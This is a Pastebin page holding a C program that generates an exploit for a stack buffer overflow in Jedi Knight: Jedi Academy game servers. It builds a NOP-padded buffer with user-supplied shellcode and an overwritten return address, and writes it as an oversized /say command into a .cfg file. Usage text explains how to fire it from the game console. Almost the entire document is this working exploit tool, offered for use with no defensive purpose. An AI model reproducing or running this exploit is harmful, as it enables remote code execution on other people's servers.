Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- * jk3saybof copyright 2009 [lc]lamerlord
- *
- * This program is free software: you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation, either version 3 of the License, or
- * (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with this program. If not, see <http://www.gnu.org/licenses/>.
- **/
- #include<stdio.h>
- #include <string.h>
- #include <stdlib.h>
- #define RETOFFSETT 1004
- #define CODESIZE 1000
- #define NEWRET 0x7c873c53
- char code[CODESIZE];
- int codesize;
- int getFileSize(FILE *fp)
- {
- int size = 0;
- fseek(fp, 0, SEEK_END);
- size = ftell(fp);
- fseek(fp, 0, SEEK_SET);
- return size;
- }
- int loadBin(char *fileName)
- {
- FILE *fp;
- fp = fopen(fileName, "r");
- if(fp == 0)
- {
- printf("cannot open the file\n");
- return 0;
- }
- codesize = 0;
- codesize = getFileSize(fp);
- printf("Size of shellcode : %d Bytes\n", codesize);
- if (codesize > CODESIZE)
- {
- printf("Binary shellcode too large\n");
- return 0;
- }
- memset(code, 0x00, CODESIZE);
- fread(code, sizeof(char), codesize, fp);
- fclose(fp);
- return 1;
- }
- int main(int argc, char **argv)
- {
- FILE *cfgfile;
- unsigned int newRet;
- char buffer[1024];
- int i, j;
- int namelen = 7;
- int* Addr;
- printf("********************************************************\n");
- printf("< # ## >[lc]lamerlords JK3 cfg script maker\n");
- printf("< # # >For use in exploitation of voulnerable\n");
- printf("< ##lamer ##clan >Jedi knight Jedi Academy servers\n");
- printf("********************************************************\n\n");
- printf("This program makes a script that can be executed\n");
- printf("from the client game console that will give the server\n");
- printf("a too big string throug the /say command and the stack buffer \n");
- printf("overflows, and the return adress is overwritten to point at an instruction\n");
- printf("that jumps to the start of the local buffer we just overflowed,\n");
- printf("witch has been filled with user specified shellcode in raw binary format.\n\n");
- printf("Check http://aluigi.org/adv/jamsgbof-adv.txt for info about this voulnerability\n\n\n");
- newRet = NEWRET;
- if (argc < 3)
- {
- printf("Usage: crashconf <SHELLCODE> <OUTPUT>\n");
- printf("---SHELLCODE is a raw binary shellcode\n");
- printf("---OUTPUT.cfg is a text file u need to put in gamedata/base/ \n");
- printf("---Type /exec OUTPUT.cfg in JK3 console to test the exploit\n\n");
- return 0;
- }
- if(loadBin(argv[1]) == 0) //load the raw shellcode from a binary file
- {
- printf("error while loading raw shellcode file: %s \n", argv[2]);
- printf(" Press any key to exit\n");
- return 0;
- }
- cfgfile = fopen(argv[2], "w");
- //open the text file to put the game commands in
- if(cfgfile == 0)
- {
- printf("couldnt open JK3 config file: %s \n", argv[1]);
- return 0;
- }
- memset(buffer, 0x90, 1024);
- for( i = 0; i < (RETOFFSETT + namelen); i++)
- {
- if(i == ((RETOFFSETT + namelen) -8) - codesize ) //prints the shellcode
- {
- for(j=0; j < codesize; j++)
- {
- buffer[i+j]=code[j];
- }
- printf("Printing %d bytes of code\n", codesize);
- }
- if(i == ((RETOFFSETT + namelen)-8)) //overwrite returnadress
- {
- Addr = (int*)&buffer[i];
- (*Addr) = newRet;
- buffer[i+4] = 0;
- printf("Printing adress: 0x%x over the return adress\n", newRet);
- break;
- }
- }
- fprintf(cfgfile, "say \"%s\"", buffer); //print the overflowing string to cfgfile
- fclose(cfgfile);
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement